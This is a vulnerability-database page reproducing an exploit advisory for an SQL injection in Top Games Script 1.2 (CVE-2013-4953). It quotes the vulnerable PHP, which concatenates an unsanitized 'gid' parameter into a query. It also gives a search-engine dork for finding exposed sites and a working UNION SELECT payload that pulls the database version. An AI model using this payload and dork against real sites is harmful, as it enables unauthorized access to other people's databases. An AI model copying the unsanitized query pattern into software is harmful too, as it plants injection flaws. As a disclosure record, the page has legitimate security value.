Top Games Script 1.2 - 'play.php?gid' SQL Injection
| Reporter | Title | Published | Views | Family All 7 |
|---|---|---|---|---|
| CVE-2013-4953 | 24 Jun 201300:00 | – | circl | |
| CVE-2013-4953 | 29 Jul 201323:00 | – | cve | |
| CVE-2013-4953 | 29 Jul 201323:00 | – | cvelist | |
| EUVD-2013-4797 | 7 Oct 202500:30 | – | euvd | |
| CVE-2013-4953 | 29 Jul 201323:27 | – | nvd | |
| Sql injection | 29 Jul 201323:27 | – | prion | |
| CVE-2013-4953 | 22 May 202506:21 | – | redhatcve |
TopGamesScript-v1.2 (play.php) Sql Injection Vulnerability
====================================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [[email protected]] , [[email protected]]
.:. Home : http://www.iphobos.com/blog/
.:. Script :
http://sourceforge.net/projects/gamesscript/files/latest/download?source=directory
.:. Dork : inurl:"play.php?gid=" "Powered By TopGames.ws"
####################################################################
######################################
VULNERABILITY: CLASSIC MYSQL INJECTION
######################################
/play.php (LINE: 4-19)
-----------------------------------------------------------------------------
$gameID= $_GET['gid'];
$con = mysql_connect($dbserver,$dbuser,$dbpassword);
if (!$con)
{
die('Could not connect: ' . mysql_error());
}
mysql_select_db($dbname, $con);
$sqlselect="SELECT * FROM games WHERE gameid=" . $gameID;
$result = mysql_query($sqlselect);
$row = mysql_fetch_array($result);
$gwidth = $row['width'];
$gheight = $row['height'];
-----------------------------------------------------------------------------
#####################################################
EXPLOIT
#####################################################
http://localhost/TopGamesScript/play.php?gid=null and 1=2 UNION SELECT
1,2,3,4,5,6,7,version(),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
####################################################################Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
29 Jun 2013 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 27.5
EPSS0.0105